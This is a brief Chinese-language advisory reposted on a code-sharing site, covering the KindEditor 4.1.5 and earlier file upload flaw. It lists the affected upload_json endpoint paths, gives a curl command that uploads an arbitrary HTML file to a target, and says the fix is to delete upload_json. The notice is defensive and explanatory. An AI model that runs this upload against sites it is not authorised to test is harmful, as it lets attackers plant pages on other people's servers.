kindeditor<=4.1.5 文件上傳漏洞利用


kindeditor<=4.1.5 文件上傳漏洞 - Kindeditor <=4.1.5 file upload vulnerability and use

  

  漏洞存影響版本:小於等於4.1.5的kindeditor 編輯器

  漏洞影響:上傳任意. txt 和. html 文件

  漏洞存在動態腳本語言: php/asp/jsp/asp.net

  漏洞存在的證明文件:upload_json.*  具體路徑如下:

  /kindeditor/asp/upload_json.asp

  /kindeditor/asp.net/upload_json.ashx

  /kindeditor/jsp/upload_json.jsp

  /kindeditor/php/upload_json.php

利用方式:

curl -F "imgFile=@1.html" http://url/kindeditor/asp/upload_json.asp?dir=file

1.html為想要上傳的文件

 

在返回中得到上傳后的路徑,然后訪問

 修復

刪除upload_json.asp即可。

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM